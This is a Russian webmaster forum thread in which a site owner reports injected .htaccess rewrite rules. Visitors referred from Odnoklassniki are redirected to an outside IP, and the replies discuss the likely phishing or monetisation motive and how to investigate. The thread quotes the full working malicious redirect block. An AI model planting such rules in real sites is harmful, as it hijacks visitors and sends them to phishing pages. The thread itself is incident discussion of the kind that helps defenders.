Взломали, сделали вставки в .htaccess сайтов, вопрос зачем?

12
BM
На сайте с 16.02.2009
Offline
176
2095

Вчера на одном очень "хорошем" хостинге опять обнаружил взлом, почти на всех сайтах в .htaccess к уже имеющемуся добавили код

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(odnoklassniki)\.(.*)
RewriteRule ^(.*)$ http://88.198.192.229/r.php?ref=%{HTTP_REFERER}&query=%{QUERY_STRING} [R=301,L]
</IfModule>

Судя по коду(поправьте, если не так) переправляется трафик на 88.198.192.229, если реферер содержит "odnoklassniki", но зачем и кому могло такое понадобиться, маскируют трафик с одноклассников?

Z2
На сайте с 15.11.2009
Offline
84
#1

Скорее всего добавляли во все сайты на автомате, и ваш заодно зацепили.

Узнайте что за хостер на этом IP и жестоко накажите хацкеров!

По коду не подскажу, только начал изучать ModRewrite.

Могу ошибиться, что-то типа если на ваш сайт зашли по запросу "однокласники", то переправить на указанный IP с тем же запросом

http://urlquery.net/report.php?id=107532

E
На сайте с 26.08.2012
Offline
63
#2

вот данные на этот айпи: https://apps.db.ripe.net/search/query.html?searchtext=88.198.192.229#resultsAnchor

А сымсл и вправду не очень понятен ... если к вам пришли в результате поиска с одноклассников (там есть поиск???), то перегнать серфера с этим же поисковым запросом на свой фид?

Монетизируют пользователей одноклассников что ли?

О самом спокойном хостинге - это когда тебе не хамит саппорт и не падают сайты ))) (http://goo.gl/ihhOXx) --- Как продать/купить сайт не опасаясь мошенничества (http://www.telderi.ru/?pid=05bd88)
Mik Foxi
На сайте с 02.03.2011
Offline
1139
#3

скорее всего это не хостер "хороший", а вебмастер "пряморукий" :D

Универсальный антибот, антиспам, веб файрвол, защита от накрутки поведенческих № 1 в рунете: https://antibot.cloud/
E
На сайте с 26.08.2012
Offline
63
#4

перекидывает на topprizy.ru

зареган в reg.ru - можно абузить

http://www.whois.com/whois/topprizy.ru

BM
На сайте с 16.02.2009
Offline
176
#5
foxi:
скорее всего это не хостер "хороший", а вебмастер "пряморукий"

у вебмастера аналогичные сайты и на других хостингах, но там все нормально, причем, что характерно, раньше на измененных файлах при взломе стоял пользователь рут, а теперь меняют так, что и юзер тот же и даже дата изменения файла не меняется...

---------- Добавлено 20.09.2012 в 19:50 ----------

Exhumer:
перекидывает на topprizy.ru
зареган в reg.ru - можно абузить

а как доказать, что это они сделали, а не кто-то другой?:)

ValdisRu
На сайте с 02.10.2006
Offline
139
#6
Burner-M:
у вебмастера аналогичные сайты и на других хостингах, но там все нормально, причем, что характерно, раньше на измененных файлах при взломе стоял пользователь рут, а теперь меняют так, что и юзер тот же и даже дата изменения файла не меняется

имхо, если стоит владелец файла рут, а вы не рут как я понял, то исходный файл был удален и вместо него создан новый и именно рутом

а если пользователь не поменялся то это может быть и хостера ломанули (с правами рута отредактировали файл но влыделец то не поменялся) а может и вас взломали и с вашими правами изменили файл

и то что на других хостингах проблем нет тоже не может означать что зараза не у вас, может пароль вытянули из фтп клиента в котором был пароль только от последнего посещенного аккаунта

Обалденный заработок на социальных сетях (https://goo.gl/Qtsq6M)
WebGomel
На сайте с 29.10.2011
Offline
78
#7

Burner-M, может конечно и хостер у вас такой, но айболитом вы все свои сайты на этом акке всё же проверьте. Не удивлюсь, если найдёте что-нибудь интересное, вроде шелла.

А если не найдёте - выход один - бежать :)

Удалённый системный администратор ( https://remadmin.com )
RiDDi
На сайте с 06.06.2010
Offline
285
#8
Burner-M:
зачем и кому могло такое понадобиться, маскируют трафик с одноклассников?

Да ладно, ну что Вы уж ))

Пациент с одноклассников переходит по внешней ссылке, редиректится на сайт злоумышленника, который так же выглядит как одноклассники. Там ему говорят "ссылка содержит вирус, переход заблокирован. Одноклассники заботятся о Вашей безопасности!" и предлагают или "Срок действия Вашего пароля истек. Создайте новый пароль, а для подтверждения введите старый" или "введите номер телефона для бла бла бла".

Вебмастер отдыхает на бережках морей. Заработок в интернете - дело техники.
E
На сайте с 26.08.2012
Offline
63
#9

Мир полон мошенников, а мы так наивны.. Как жить дальше )))))

IL
На сайте с 20.04.2007
Offline
435
#10
Burner-M:
но зачем и кому могло такое понадобиться, маскируют трафик с одноклассников?

Может форму авторизации покажут?

... :) Облачные серверы от RegRu - промокод 3F85-3D10-806D-7224 ( http://levik.info/regru )
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий